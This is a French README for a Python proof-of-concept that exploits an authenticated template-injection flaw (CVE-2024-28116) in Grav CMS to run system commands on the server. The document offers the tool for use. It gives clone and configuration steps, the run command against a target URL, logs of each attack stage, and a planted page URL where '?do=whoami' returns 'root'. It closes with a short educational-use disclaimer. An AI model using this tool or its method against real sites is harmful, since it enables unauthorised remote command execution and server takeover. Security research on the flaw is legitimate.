
est un script Python de PoC qui exploite une vulnérabilité authentifiée d'injection de template côté serveur (SSTI) dans Grav CMS versions <= 1.7.44 (CVE-2024-28116)
GenGravSSTIExploit est un script PoC Python qui exploite une vulnérabilité authentifiée d'injection de templates côté serveur (SSTI) dans Grav CMS versions <= 1.7.44 (CVE-2024-28116). Cette vulnérabilité permet à un utilisateur disposant des droits d'éditeur d'exécuter des commandes système sur un serveur distant.
Remarque : Ce script nécessite des identifiants valides pour s'authentifier sur la console Grav CMS.
requests (installer avec pip install requests)Cloner le dépôt
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Configurer les identifiants
Modifiez le script pour fournir vos identifiants d'éditeur Grav CMS :
GRAV_USER = "votreutilisateur"
GRAV_PASSWORD = "votremotdepasse"
Exécuter le script
Utilisez la commande suivante pour lancer le script :
python GenGravSSTIExploit.py -t <URL_CIBLE> -p <PORT>
<URL_CIBLE> : URL cible au format http[s]://nomhôte.<PORT> : Numéro de port (par défaut 80).Exemple :
python GenGravSSTIExploit.py -t http://example.com -p 8080
Interagir avec l'exploit
Si l'exploit est réussi, vous obtiendrez une URL où vous pourrez exécuter des commandes système :
[+] Charge utile RCE injectée. Visitez la page malveillante : http://example.com:8080/poc_<ID>?do=<commande>
python GenGravSSTIExploit.py -t http://example.com -p 8080
Le script effectuera chaque étape en vous fournissant des mises à jour via le terminal. Voici ce que vous pourriez voir :
2024-10-02 12:00:01 - INFO - Vérification de l'URL cible...
2024-10-02 12:00:02 - INFO - Obtention du cookie de session et du login-nonce...
2024-10-02 12:00:03 - INFO - Tentative d'authentification sur Grav CMS...
2024-10-02 12:00:04 - INFO - Accès au panneau d'administration après authentification...
2024-10-02 12:00:05 - INFO - Création d'une nouvelle page...
2024-10-02 12:00:06 - INFO - Obtention du form-nonce et de l'unique_form_id...
2024-10-02 12:00:07 - INFO - Injection de la charge utile RCE...
2024-10-02 12:00:08 - INFO - [+] Injection RCE réussie. Rendez-vous à l'adresse : http://example.com:8080/poc_4T7B?do=<commande>
Une fois le script terminé, vous verrez un message contenant le lien vers la page injectée. Vous pouvez visiter ce lien pour exécuter des commandes système :
http://example.com:8080/poc_4T7B?do=whoami
La visite de l'URL avec la commande spécifiée affichera la sortie directement sur la page :
Cmd-Output :
root
Cet outil est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce script.